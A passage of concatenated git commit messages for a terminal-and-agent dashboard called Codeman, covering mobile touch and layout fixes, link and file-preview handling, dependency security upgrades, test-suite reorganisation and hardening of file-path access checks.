toolbar and accessory bar are `position: fixed`, so they occupy no layout space
and `main`'s padding-bottom is the ONLY thing reserving room for them. Shrinking
it by the full sub-row slack pulled the terminal's bottom edge down underneath
them, and the row the following re-fit gained was painted behind them — clipping
the last line of a long prompt. The shrink now has a floor: the MEASURED height of
the currently-visible fixed bars, so genuine over-reservation of the hard-coded
84px is still reclaimed while a device that needs those pixels keeps them. The
floor is `Math.min(currentPadding, measured)`, so it can only ever prevent a
shrink, never cause a grow that would resize the terminal as a side effect.
Overlay behaviour lives in `packages/xterm-zerolag-input/` (single-source; the
vendor bundles are generated), so the fix is in the package with the row count
passed in as an optional `totalRows` — absent, the layout is exactly as before.
Tests: 7 cases in the package's `overlay-renderer.test.ts` (upward lift, tail
retention, indent drop, cursor on the last visible line, and the unclamped
fallbacks) and 7 in a new `test/mobile-keyboard-bottom-padding.test.ts` (reclaim,
floor, partial reclaim, no-grow, hidden bars, CJK strip, whole-row slack). 5 and 4
of them respectively fail without the fix. Package suite 238 pass, including the
codex byte-identity and replay tests.
Verified on Android + Chrome against a live instance: a ~460-character prompt
wrapping ~12 rows stays on screen while typing and arrives at the PTY intact.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
There was no way to copy terminal text from a phone at all, and three layers
ruled it out independently: `user-select: none` across the whole terminal subtree
on touch devices (taps are cursor gestures there, so the OS callout had to go),
the WebGL renderer drawing glyphs as pixels with only the accessibility tree
behind them, and xterm's own selection being a mouse DRAG while the touch path
dispatches a zero-movement mousedown/mouseup pair — a click. `copyTerminal()`
exists but is wired to no button and calls `navigator.clipboard` directly, which
is undefined on the plain-HTTP LAN install the installer offers.
So the gesture drives xterm's `select()` directly: public API, renderer-
independent, and the highlight is drawn by xterm itself. Long-press is free real
estate — tap and swipe are taken, long-press and double-tap are used by nothing.
- **Long-press** (350ms, finger still within the shared tap slop) selects the
run of non-whitespace under the finger. Whitespace is the only delimiter on
purpose: every punctuation-aware word rule cuts a path, URL or hash in half,
which is what you came to copy.
- **Drag** while held extends the selection; touchmove diverts from scrolling.
- **Tap** while the bar is up extends it too. That is the ergonomic core:
picking up a 4px handle with a fingertip is a coin flip, tapping the other end
is not. Dismissal stays explicit (✕ or Copy), so no tap is spent leaving a mode
the user is still using.
- **Copy** goes through the existing `copyTerminalSelection()`, so it inherits
the execCommand fallback that is the only route that works on plain HTTP.
- **Line** takes the whole logical line, wraps included, trailing pad trimmed.
Three guards are what make the gesture survive contact with a real phone, and
each fixes a symptom measured on Android Chrome:
1. **The compat mouse pair after touchend.** xterm focuses from its screen-element
mousedown and SelectionService resets the model there, so lifting your finger
popped the keyboard and dissolved the selection in one go. The tap path already
had a guard for those events; the selection path simply never armed it. Armed
now, and the touchend is `preventDefault`ed so the synthesis is stopped at the
source (that listener is no longer passive).
2. **The platform's own long-press.** Android Chrome runs its handling at ~500ms
and focuses the nearest editable element — xterm's helper textarea, parked at
the cursor — which no touch handler can preventDefault because it never sees an
event. A focus guard blurs the terminal input for the duration of the gesture,
whatever focused it, bounded by a self-expiring deadline so a stuck flag can
never leave the keyboard unreachable. `contextmenu` is suppressed for the same
window, and the threshold sits at 350ms so it lands clear of the platform's.
3. **Copy re-focusing the terminal.** `copyTerminalSelection()` ends with
`terminal.focus()`, which is right on a desktop and wrong on a phone: the
keyboard covers what was just copied with nothing waiting to be typed.
The bar is built in JS because index.html is read once at server start, and its
styles live in styles.css rather than mobile.css because the gesture is
touch-driven, not width-driven — a touch tablet in landscape gets the gesture and
would otherwise have no bar to copy from.
12 tests in `terminal-touch-tap.test.ts` cover the word rule, forward and
backward extension, cross-row selection, Line, tap-to-extend, the copy path, and
each of the three guards including the focus guard's expiry.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
On a phone no link was openable, on either surface, for two unrelated reasons.
**Terminal.** xterm resolves the link under the pointer on `mousemove` and
activates it on `mouseup` over its SCREEN element. A touch tap delivers neither:
`touch-action: none` on the terminal subtree plus touchstart's preventDefault for
a 'content' tap suppress the browser's compatibility mouse events,
`_installMobileTapMouseGuard` drops the trusted ones that still arrive inside the
450ms tap window, and the synthetic mousedown/mouseup pair dispatched for mouse
REPORTING goes to the `.xterm` root — an ancestor of the node the linkifier
listens on, so it cannot reach it — and carries no mousemove either way. Every
URL and file path in the terminal was therefore inert on phones and tablets,
Claude Code's own `/login` URL included.
The tap path now activates the link itself, through the SAME provider that feeds
the hover linkifier (`_terminalLinkAtPoint`), so a tap and a desktop click can
never disagree about what is a link or where it ends — containment mirrors
xterm's own `_linkAtPosition`. It runs synchronously inside the touchend handler,
which is what keeps the user gesture that lets `window.open` past the popup
blocker, and before any mouse report, exactly as `_handleDesktopTerminalClick`
already skips the SGR tap for a hovered link.
Two kinds of row keep their existing meaning: the caret's logical line, where a
tap places the cursor and a URL the user typed must stay editable, and TUI-owned
rows, where a numbered choice or an expandable readback is answering a dialog and
routinely carries the very path the tap would otherwise open. The caret line is
the boundary rather than the tap intent, because a plain shell classifies EVERY
tap as 'input' and gating on that would leave every URL in shell output inert.
**Chat.** `marked` emits a bare `<a href>` and the markdown sanitizer's allowlist
carries no `target`, so a tap in the response viewer navigated the current tab
away: on a phone that unloads the whole dashboard — SSE, terminal buffers, unsent
composer text — and there is no middle-click or open-in-new-tab affordance to
work around it. `_renderMarkdown` now decorates anchors in the template pass it
already makes for code blocks. That pass runs AFTER sanitizing, so it is the only
source of both attributes: an agent-authored `target`/`rel` is already stripped,
and `rel="noopener noreferrer"` is set on the same element in the same breath, so
no page Codeman opens gets a `window.opener` handle back. Fragment links stay
in-page; mailto:/tel: are left to the OS rather than stranding an empty tab.
Tests: 10 cases in `terminal-touch-tap.test.ts` (URL, file path, log path,
scrollback, no-double-report, composer, shell mode, dialog row, no provider) and
a new `response-viewer-external-links.test.ts` driving the shipped marked +
DOMPurify + app.js. 7 of them fail without the fix.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
GET /api/sessions/:id/files gains an optional `q`. With one, the endpoint
answers a FLAT match list instead of a nested tree; without one, the response is
exactly what it was, so every existing caller is untouched.
compileFileQuery() (src/utils/file-query.ts) turns the query string into a
reusable predicate, so the walk prunes as it goes rather than streaming the
whole tree to the client to be filtered there. An empty or whitespace-only
query compiles to null, which is what makes "no query" and "blank query" the
same thing.
The search walk deliberately recurses past directories that do not match — a
file whose ancestors don't match is exactly what people are searching for — so
it carries its own maxMatches cap on top of the existing maxFiles and maxDepth
ones, and reports `truncated` when it stops early. Hidden-file and
excluded-directory rules are the same ones tree mode already applies.
Tests: file-query.test.ts covers the matcher; routes/file-search-mode.test.ts
drives the endpoint against a real temp tree and pins the two properties worth
having — that the walk reaches a match under non-matching parents, and that an
absent or whitespace query leaves the tree response alone. Gating the recursion
on a match turns those red.
Shell prompts using Nerd Font glyphs (powerline, p10k/starship folder and
git icons) rendered as missing-glyph boxes: the built-in xterm stack has no
private-use-area symbols, and phones have no Nerd Fonts installed at all.
- Bundle Symbols Nerd Font Mono (icons-only, MIT, 1.2MB woff2) served from
fonts/ and appended to the terminal stack before monospace — browsers fall
back per glyph, so icons render everywhere while text stays in the text
fonts. font-display: block + preload keep tofu out of xterm's glyph atlas.
- New per-device terminalFontFamily setting (App Settings > Terminal &
Input > Font): prepended to the built-in stack, never a replacement, so
the symbols fallback and final monospace always survive. Applied live on
save (refit + echo-overlay refreshFont, mirroring setFontSize).
- Single source for both xterm surfaces: TERMINAL_FONT_DEFAULT_STACK +
resolveTerminalFontFamily() in constants.js, unit-tested.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Claude-Session: https://claude.ai/code/session_01VjnbbZRBuvR5E3SDouwXr9
Resolves the four advisories that reach the production dependency tree. The
other 16 npm audit reports are devDependencies-only (Remotion, Puppeteer,
postcss, the eslint/tsx toolchain) and never ship to users.
- @fastify/static 9.1.3 -> 10.1.3 GHSA-8pvw-jcv7-9cmj (authz bypass via
non-canonical URL paths). Covers <=10.1.1, so all of 9.x is affected and
the fix exists only on the 10.x line.
- find-my-way 9.6.0 -> 9.8.0 GHSA-c96f-x56v-gq3h (HTTP/2 DDoS)
- fast-uri 3.1.2 -> 3.1.5 GHSA-v2hh-gcrm-f6hx (host confusion)
- brace-expansion -> 5.0.9/1.1.18 GHSA-3jxr-9vmj-r5cp (expansion DoS)
The last three are transitive and needed only a lockfile re-resolve, so no
overrides were introduced.
The @fastify/static major changes setHeaders' first argument from a Node
ServerResponse to a FastifyReply. Two consequences:
1. res.setHeader() -> reply.header(). The v9 body throws TypeError from
inside the plugin on every static request.
2. Precedence flips, silently. The callback used to write to the raw
response and lose to the route's staged reply headers; it now writes to
the reply and wins. That gave /sw.js a year of immutable in place of the
no-cache, no-store its route sets, pinning a service worker on every
client with no server-side recovery. A route that already set
Cache-Control now keeps it.
Verified against v9 to confirm the sw.js behaviour is a regression and not
a pre-existing bug.
ws appears in npm audit but production is on 8.21.0, outside the vulnerable
range; the only affected copy is bundled under @remotion/renderer (dev-only,
and remotion is pinned at 4.0.473 because the compositor refuses to start on
a version mismatch).
Adds test/static-cache-headers.test.ts, which drives a real server and covers
a caching contract that had no test at all.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
`npm test` ran config/vitest.config.ts, which includes the browser, visual and
perf suites. On any machine without chromium, a free port and per-machine PNG
baselines that fails ~87 tests on a clean master, so the repo's most obvious
command could not be used as a pass/fail signal. The workaround had spread into
four docs as "never run bare `npm test`" warnings.
`npm test` now runs config/vitest.ci.config.ts — byte-for-byte what CI runs — so
local green means CI green. Verified: 264 files, 5248 tests, exit 0.
The suites it leaves out are not abandoned; each has a command:
test:browser 5 Playwright files (chromium + a live server; codex-predictive-echo
also needs a real codex binary)
test:mobile unchanged — the above plus per-machine PNG baselines
test:perf 2 wall-clock benchmarks; need an otherwise idle machine
test:all the old everything-behaviour, kept reachable
test:ci is untouched (CI still calls it). test:watch and test:coverage follow
test onto the gate's config.
The more important half is the hole this closes. The exclusion list lived as
literals in one config and pointed one way only: a file excluded from CI and
added to no runner would be tested by NOTHING, silently, with every command
still green — vitest counts "no files matched a filter" as success. That is the
same shape as the #279/#280 blind spot already documented in CLAUDE.md.
So the globs moved to config/test-suites.ts, one array per REASON a suite cannot
run in CI, and all three configs derive from it. test/test-suite-partition.test.ts
then checks the arithmetic against the files on disk: it fails if any test file
is reachable by no runner, or by two. Confirmed it fires by orphaning a file and
watching it name it. The partition is exact today:
gate 264 + browser 5 + perf 2 + mobile 9 = 280 = every *.test.ts in the repo
⚠️ One sharp edge, deliberate and documented: a file filter must match its
runner. `npm test -- test/mobile/keyboard.test.ts` now matches nothing and exits
GREEN having run zero tests, because the gate's config excludes that path.
CLAUDE.md recommended exactly that command in the on-screen-keyboard note; that
line now says `npm run test:mobile -- <file>`, and the Testing section calls out
the trap, since a green run of zero tests is worse than a red one.
Docs synced: CLAUDE.md, AGENTS.md, .github/CONTRIBUTING.md, README.md,
README.zh-CN.md, and two ci.yml comments that claimed only test/mobile/** was
excluded — it is three suites, and 5 Playwright files rather than 3.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Each cycle step (kickstart, update, /clear, /init) checks for `stopped` before
`await session.writeViaMux(...)`, then emits `stepSent` and calls
`setState('waiting_*')` after it.
stop() is asynchronous with respect to that await. One that lands while the
write is in flight has already passed the guard that ran, so the post-await
setState() puts a stopped controller back into a waiting state — re-arming its
step timers against a session the user asked to stop.
Re-check after the await, before emitting and setting state.
The guard reads the public `state` getter rather than `_state` on purpose:
TypeScript narrows `_state` across the await from the pre-await check and cannot
see that stop() mutated it, so `this._state === 'stopped'` is rejected as a
comparison with no overlap (TS2367) at all four sites.
Adds test/respawn-stop-race.test.ts, which drives the interleaving
deterministically by calling stop() from inside the mocked write rather than
relying on timing. All four steps go red without these guards.
validateSessionFilePath realpath-resolves the candidate path but compared it
against the raw sessionWorkingDir. When the workspace is itself reached through
a symlink the two sides live in different namespaces, so relative() reports a
spurious `../` and every file in that workspace is judged an escape — reads and
writes in the session are refused wholesale.
That is not an exotic setup: os.tmpdir() hands back a symlinked path on macOS
(/tmp -> /private/tmp), and symlinked project directories and bind-mounted case
paths hit it too.
Resolve both sides and compare canonical to canonical. This only makes the
comparison honest — it does not widen it. The candidate keeps its own realpath,
so a symlink pointing out of the workspace and a ../ traversal are still
refused, and a workspace that cannot be resolved now fails closed.
Three stubs in file-routes.test.ts used a blanket
realpathSync.mockReturnValue(escapeTarget), which answers the same path for the
workspace and the candidate; with both sides resolved that makes an escape look
contained. They now use the input-aware mockImplementation idiom the rest of
that file already uses, so the workspace resolves to itself and only the
candidate escapes. Verified they still bite: removing the confinement check
turns all of them red.
Adds test/route-helpers-symlink-confinement.test.ts, which exercises the
function against a real symlinked workspace on disk and pins the negative cases
(../ escape, symlink-out, missing file) alongside the fix.
Session List Layout gains a third option. The old "Left sidebar" becomes
"Left sidebar simple" and is unchanged down to the byte; the new "Left sidebar"
puts on each row what the desktop home rail and the phone overview already show:
when the session was first created, how long it has been in the state it is in,
and a status pill naming that state.
A docked column is not a tab strip. It has width to spare and a row per session
either way, and "name + folder" is the whole story a TAB can tell, not the whole
story there is. This is the information that was missing, and it already existed
one surface over.
Both sidebar values are the same layout, and both set data-session-list="sidebar";
the row detail rides on a separate data-sidebar-detail attribute. That split is
the load-bearing decision here: every one of the ~25 isSessionSidebarActive()
call sites and every html[data-session-list="sidebar"] rule in styles.css and
mobile.css keeps matching both variants without being touched. A third
data-session-list value would have meant auditing and editing all of them.
- Stored values: 'header', 'sidebar' (simple), 'sidebar-rich'. Anyone already on
'sidebar' keeps exactly the layout they picked — the rename is label-only.
- State classification and the "how long has it been like this" anchor come from
_mobileOverviewState() / _mobileOverviewSince(), not re-derived, so the three
surfaces cannot disagree about what "working" means. A working pane repaints
~1/s, so its duration is measured from the turn's last Enter: a running turn
reads "working 12m", not "0m".
- Stamps refresh in place on a 20s clock rather than by re-rendering — a rebuild
would restart every load spinner and alert animation in the list, twice a
minute. The clock runs only while rich rows are on screen, and is stopped from
both render paths and from applySessionListLayout().
- The incremental render path updates the pill, the accent class and the since
anchor; a tick alone cannot see a state change, and a new turn re-stamps
lastSubmitAt without changing state.
- applySessionListLayout() now re-renders on a DETAIL change too. simple <-> rich
leaves data-session-list on 'sidebar' both times, and the meta line is emitted
by the row template rather than toggled by CSS, so the old layout-only test
would have flipped the setting and repainted nothing.
- Width: 300px for the extra line. The collapsed 44px rail and the handheld
drawer are both explicitly held back from it — the desktop rule is (0,3,1) and
would otherwise out-specify mobile.css's (0,2,1) drawer base and pin a 320px
phone's drawer to 300px.
- Missing/stale mobile-overview.js degrades to a row with no meta line rather
than throwing and taking the whole tab strip down.
15 new tests cover the attribute split, the solo-window override, the
detail-change re-render, the row model, both render paths, the clock lifecycle
and the mobile width guard.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The frontend load order omitted session-lineage.js (29 modules listed, 30
loaded), and several inventory counts had drifted from the tree: route handlers
~200 to ~217 with system, files and approvals each understated, src/config 20 to
21 files, install.sh 69KB to 92KB, and the Prettier exemption list, which also
never mentioned mobile.css. Two of the missing handlers are endpoints CLAUDE.md
already documents in prose but never counted.
postcss is imported by two tests but was only present transitively via vite, so
knip reported it as an unlisted dependency. Declared at the version already
resolved in the lockfile.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Lineage arcs were coloured per child, so one tab's own workers each got a
different colour, which is the distinction the colours exist to make. The colour
is now keyed on the parent: every arc leaving one tab is the same colour however
many workers it spawns, so the strip reads as "these five came from w1, those
two came from w2". A child that spawns in turn is a parent in its own right and
gets its own colour for the arcs below it, so a chain changes colour at each
generation while each generation's fan-out stays uniform.
The new tests drive the real _appendLineageConnectionLines() and assert the
painted custom property, because testing the colour function alone passes just
as happily with the child id passed back in.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The active tab is the only one that grows a gear and a close button, and with a
short session name they were eating it: "w1" rendered a 13px label while gear
plus close took 50px of a 116px tab, so the tab's geometric centre landed on the
gear and a thumb aiming at the middle of the tab opened Session Options instead
of switching sessions. Reserving a minimum label width on the active tab widens
the tab by the difference instead.
The floor is set by the 10th tab onward, which renders no number badge and so
sits 10px further right; a numbered tab clears the icons at 20px but a
numberless one needs 40px. The test recomputes that inequality from the
stylesheet rather than pinning the pixel.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
30 pages covering install, concepts, the dashboard, the agent CLIs, unattended
runs, remote and Docker cases, security and the HTTP API, plus a sidebar and a
footer. The wiki repo has no CI and no review, so docs/wiki is the source of
truth and .github/workflows/wiki-sync.yml mirrors it on every push to master.
The workflow refuses to mirror when docs/wiki is missing or holds no pages,
because it deletes before it copies and would otherwise publish the deletion of
every page. The footer carries a {{VERSION}} placeholder stamped at publish
time rather than a hand-written version, which went stale on every release.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Give the active-session handoff one owner: closeSession captures wasActive before its await and the session_deleted handler stands down for a close this tab started.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Gate the idle-alert acknowledgement to human selections: the boot restore, a solo window opening its target, and the post-close fallback no longer spend a yellow tab alert.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Red tab alerts track the dialog, not the keyboard: typing no longer clears them, and a dialog answered in the terminal resolves itself on the next listing.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Persist the 'I checked it' state of yellow idle tab alerts across reloads and devices.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Five post-merge review items from PRs #306 (clickable file paths) and
#307 (session sidebar):
- constants.js FILE_PREVIEW_EXTENSIONS gains the media extensions it was
missing vs the single-source sets in attachment-registry.ts (m4v ogv
ogg oga m4a aac flac opus), so an in-workspace .m4a opens the preview
player instead of the log viewer; new test/media-extension-parity.test.ts
pins all three copies (constants.js, panels-ui.js, attachment-registry.ts)
against each other.
- FILE_PATH_LINK_PATTERN drops `etc` from its root alternation: /etc is
unconditionally in DEFAULT_BLOCKED_TREES, so every /etc link 403'd.
Negative cases added to the link-provider and response-viewer tests.
- updateSidebarCount() counts the rows actually on the sidebar list
(session rows + web-tab rows, minus filtered-out ones) instead of
this.sessions.size, and applySidebarFilter() refreshes it so the count
follows the filter box per keystroke.
- The incremental-render connection-line gate now also fires in sidebar
layout (this._lineageEdgeCount is permanently 0 there), matching the
strip-scroll listener widened in #307, so a badge changing row heights
redraws subagent/ultracode connectors.
- isSensitivePath() blocks ~/.claude.json, ~/.claude/settings.json and
~/.claude/settings.local.json (credential-bearing by schema), anchored
to homedir() read at check time so case-level .claude/settings*.json
files stay servable in the File Viewer.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Root cause of the reviewer's mass-bump measurement (17 of 17 sessions with an
identical lastActivityAt): every restart restamps all sessions in the
constructor loop, and the boot auto-attach's repaint re-bumps the rest within
the same second. A 12-minute steady-state sample shows NO ambient mass bump,
so restarts are the whole story, and Codeman restarts on every deploy.
The stamp now has a display twin: recovery threads the previous run's
lastActivityAt from state.json into the wire-visible stamp (getter + toState),
and a 15s settle window keeps the attach repaint from overwriting it. Real
actions (input, task assignment, respawn) always write through. The private
stamp keeps its boot-anchored semantics untouched, because the idle
confirmation reads it as how long the pane has been quiet.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Post-#304 follow-ups. The install-vs-refresh decision (workspaceHooksEnabled,
default ON) moved from a session-routes-local helper into hooks-config.ts as
applyWorkspaceHooks(workspace, install?), and the claude session-create sites
that bypassed it now go through it: cron job fires (cron-service), legacy
scheduled-run iterations (runScheduledLoop), and the plan-orchestrator research
and planner one-shots. A cron or scheduled run firing in a linked case that
never had an interactive session ran hook-blind (no stop for completion
detection, no tab alert on a blocking dialog).
The shared core also carries the two guards every caller needs: a workspace
that no longer exists is skipped (ensureCodemanHooks mkdir -p's, so the boot
recovery sweep used to resurrect a deleted repo as an empty tree holding only
.claude/settings.local.json), and all errors are swallowed since a create must
never fail on hooks. Route handlers keep resolving the setting through their
ConfigPort and pass it in; non-route callers omit it and the core reads
settings.json itself (absent key or unreadable file = ON).
Two adjacent gates tightened in session-routes:
- the docker quick-start hooks branch excluded the five external CLIs but let
`shell` through, contradicting its own rule that only claude reads .claude
hooks; it is now gated on mode === 'claude'
- the statusLine exporter call in POST /api/sessions got the same
!remote && body.workingDir guard the hooks call got in 499d355 (it mkdirs the
same way, so a remote attach created a junk user@host:session dir locally and
a cwd-fallback create wrote into $HOME)
plan-routes' one-shot deliberately stays out: its workingDir is process.cwd(),
exactly the target 499d355 forbids writing into. restoreMuxSessions stays out
too: the boot sweep already covers recovered workspaces.
Tests: quick-start existing-case install, docker claude-installs/shell-does-not,
and the core directly (default-ON install, OFF add-nothing, OFF still heals a
stale block, malformed file untouched, vanished workspace skipped); the remote
and cwd-fallback regressions now also send statusLineTelemetry:true to pin the
statusLine guard.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Three follow-ups from the 1.19.0 review of the activity-ordered home screens:
- Hook events now ride the same debounced session state broadcast the
working/idle handlers use. The blocked group ranks on lastActivityAt, and
without this a permission prompt raised after page load kept ranking by
whatever stamp the browser loaded with.
- A working row with no submit stamp now shows the lastActivityAt fallback
its sort anchor already uses: a row must never be ranked by a number it
does not display.
- Alt+digit resolves through the live-session projection the render paints
(sessionOrder minus dead ids), so a stale id cannot shift every painted
number off its target, web tabs included. New tests pin both surfaces to
one shared order and the numbering to the live projection.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Widening the servable extensions to EDITABLE_EXTENSIONS made ~/.codeman
JSON previewable for the first time, and the blocklist named only
state.json. But settings.json holds a credential BY SCHEMA
(voiceSettings.apiKey), push-keys.json holds the VAPID PRIVATE key, and
intents.json is written 0600 precisely because captured prompts can carry
secrets — all three were one authenticated click away once an agent
printed the path. Blocked alongside state.json, whose rule now also
catches state-* siblings.
The never-re-cuts-inside-an-anchor test used an unmatchable URL tail, so
it passed with the guard deleted; the fixture now carries a matchable
/tmp path.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
The running group sorts on lastSubmitAt, but nothing pushed a session:updated
when a turn STARTS — the browser kept whatever stamp it loaded with, so a
30-second-old turn could rank (and read) as an hour-long one. The working
handler now rides the same debounced state broadcast idle already uses.
And both call sites of window.CodemanSessionOrder now degrade to tab order
when the global is missing (iOS Safari's documented stale-cached-JS after a
deploy) instead of TypeErroring the whole home screen away.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
endpoints.md named 1.18.x as the version where workspace hooks became a
setting, but 1.18.x servers do NOT have this behavior — an agent driving
one would falsely conclude its workspace has hooks. The feature ships in
1.19.0. And preamble.sh changed content this PR without bumping its
CODEMAN_PREAMBLE stamp, so a cache stamped 1.18.3 would pass the
staleness check while holding old bytes; stamp bumped to 1.19.0 in
preamble.sh and the SKILL.md heredoc together (byte-identity pin).
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
A claude-mode attachRemoteSession create overwrites workingDir with the
user@host:session pseudo-path, which is a RELATIVE path locally — the old
refresh-only call no-op'd on it, but ensureCodemanHooks mkdirs, so it
created a junk local directory. And with workingDir omitted the cwd
fallback reaches the hooks write unvalidated; under installer-created
services cwd is $HOME, so hooks materialized in ~/.claude/settings.local.json.
Both guarded at the applyWorkspaceHooks call site; regression tests prove
the remote attach leaves no junk dir and the no-workingDir create leaves
the server cwd untouched.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
Brings in https://github.com/christianhaberl/Codeman/pull/4 (three commits,
authorship preserved) and adapts it across the 211 commits master gained
since the branch was cut:
- App Settings control re-authored for the set-* surface (PR #278): a
set-row in Layout -> Tabs, replacing the old settings-item markup the
branch targeted. i18n description synced.
- Lineage arcs (PR #291, post-branch) are SKIPPED in sidebar layout:
computeLineagePath()'s U-bridge geometry hangs from the horizontal
strip's bottom edge and has no meaning against a vertical list. The
lineage strip-scroll listener now also redraws subagent/ultracode
connectors while the sidebar scrolls vertically.
- The desktop home tab rail (post-branch) defers to the sidebar: both dock
the session list flush left, and the rail would render z-ordered under it.
- Active-row reveal unified into _scrollActiveTabIntoView() (#257 landed on
master after the branch): sidebar mode branches to scrollIntoView
block:'nearest', and _fullRenderSessionTabs() restores scrollTop alongside
the #257 scrollLeft restore so ambient rebuilds cannot yank a mid-scroll
sidebar back to the top.
- Mobile active-tab hoisting the branch guarded against no longer exists on
master (removed by #257); kept master's order-stable render.
Verified: typecheck, lint, format:check, check:frontend-syntax,
check:public-assets, PostCSS parse of both merged stylesheets, the 26 new
jsdom tests, the structural guard suites, and the headless-Chromium harness
(scripts/verify-session-sidebar.mts) green across all seven layout states
at 1600/1000/393px against current master.
Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
A .json/.log/.yaml/code path outside the session workspace was refused as an
unsupported type, and clicking one in the terminal made it worse: text goes to
the log viewer, which spawns `tail -f` and allows only the workspace, /var/log
and ~/logs, so it answered "Path must be within working directory or allowed
log directories" while the same path clicked in the response viewer previewed
fine. Two surfaces, two answers, for a file the session can already cat.
- TEXT_ATTACHMENT_EXTENSIONS IS EDITABLE_EXTENSIONS (config/file-editing.ts),
not a second curated list that would drift from it. The rule reads: if the
viewer would open a file for editing inside the workspace, the same file
outside it can be read. The suffix was never the confidentiality gate here,
the path guard is (sensitive-file blocklist, /root and /etc trees, realpath
before the check), and it still runs on every registration.
- Widening what can be READ must not widen what can RUN. html/htm join svg in
serveRawFile's download-only branch, so markup is never served with a
renderable type on our own origin; other text goes out as inert
text/plain; charset=utf-8 with nosniff, matching what the path picker does.
The preview reads through fetch(), which ignores the disposition, so a
clicked .html still shows its source.
- ~/.codeman*/state.json joins isSensitivePath. It persists
SessionState.envOverrides and the env allowlist admits key-shaped names
(GEMINI_API_KEY, CLAUDE_CODE_*), so it can hold a live credential. Same
treatment as hook-secret and users.json, and the rest of the tree stays
attachable.
- The terminal sends an out-of-workspace path to the preview instead of the log
viewer. In-workspace text keeps the tail viewer, which is the point of it, and
file-stream-manager's allowlist is untouched: no `tail -f` on arbitrary host
paths.
- The by-id text preview is bounded like the workspace one: a Range request for
the first 512KB (a real partial read, not a discarded 50MB download) plus a
500-line cap, with the footer saying so.
Verified on an isolated instance: a 1.1MB external log opens in ~1.8s showing
500 lines with "showing first 500 lines" in the footer; json, yaml and code
preview; an .html carrying a script tag renders as source and does not execute;
.svg is still refused; a terminal click on an external .yaml opens the preview
with no log viewer and no attachment card; an in-workspace .log still opens the
streaming tail viewer.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
A clip an agent wrote inside the workspace played with a working scrub bar,
while the same file in /tmp was refused as an unsupported type. The workspace
preview classified media with its own inline extension sets and the attachment
allowlist had no media at all, so the two paths disagreed about what a video is.
- VIDEO_ATTACHMENT_EXTENSIONS and AUDIO_ATTACHMENT_EXTENSIONS now live in
attachment-registry.ts and are imported by file-content's classification, so
both paths answer the same. mp4/webm/mov/m4v/ogv and
mp3/wav/ogg/oga/m4a/aac/flac/opus join the attachment allowlist.
- Real MIME types for those extensions. Without one the raw route falls back to
application/octet-stream, which a <video> refuses to decode: the player
renders and then does nothing.
- getAttachmentType() gained the video and audio members of
AttachmentDetectedType. Attachment cards have no per-type CSS and their
thumbnail falls back to the type label, since the thumbnailer has no media
branch and answers 204 rather than spawning a converter.
- The preview overlay's by-id branch renders <video>/<audio> with the same
markup as the workspace branch, playsinline included. Serving was already
range-aware, so seeking works.
The image-watcher keeps its own narrow detection list (png/pdf/docx/pptx), so
this does not start popping cards for every video an agent writes. Text types
that are not md or txt (.json, .log, code files) remain out of the allowlist by
choice and still report what is previewable instead.
Verified on an isolated instance: an external mp4 and mp3 both play, seek, and
report the right duration, matching the in-workspace clip exactly, and a click
on an external mp4 in the terminal opens the player with no attachment card.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
A path an agent prints was already underlined in the terminal, but clicking
one opened the preview overlay on "File not found": file-content/file-raw
resolve against the session workingDir and refuse anything outside it, and the
paths agents print most (a /tmp capture, Claude's own scratchpad, another
checkout) are outside it by definition. In the response viewer those paths were
not links at all.
- openFilePreview() detects an out-of-workspace path and registers it through
POST /api/sessions/:id/attachments first, rendering by attachment id. That is
the surface built for live external files, so the server-side guard is
unchanged: secret trees blocked, symlinks resolved, extension allowlist. The
workspace routes keep refusing escapes exactly as before.
- New optional `notify` field on that route. `notify: false` suppresses only the
attachment:detected broadcast, so a click does not also pop a card announcing
the file already filling the screen. Default stays true for the CLI and
publish callers.
- _linkifyFilePaths() links paths in rendered response-viewer markdown. It walks
text nodes and builds anchors with DOM APIs (the source is model output; never
a string rebuild of sanitized markup), skips subtrees already inside an <a>,
and keeps the message text byte-identical so copy-code is unaffected.
- One path pattern in constants.js now feeds both the xterm link provider and
the chat linkifier, a fresh instance per call since lastIndex is per-object
state. It picks up /Users and /mnt roots (nothing was clickable on macOS or
WSL), plus docx/pptx and video/audio extensions.
- .file-preview-overlay moves to z-index 5100, above the response viewer at
5000. At its old 2000 a path clicked in the chat opened the overlay behind the
panel it was launched from.
Verified end to end on an isolated instance, desktop and phone viewport: real
clicks in the terminal and the chat both render the image, external md and pdf
render, /etc/hosts is still refused, workspace previews unchanged.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
The workspace-hooks install makes the skill's central hooks rule wrong in the
cautious direction. Six places told a worker that a linked case or a raw
workingDir has no `stop`/`blocked` and that send-and-wait cannot be trusted
there, so an agent would hand-roll output-marker synchronization in exactly the
workspaces where `wait:true` now works.
Rewritten against the setting rather than directory provenance:
- verbs.md §5.1: the where-to-spawn table, the rule paragraph (now naming
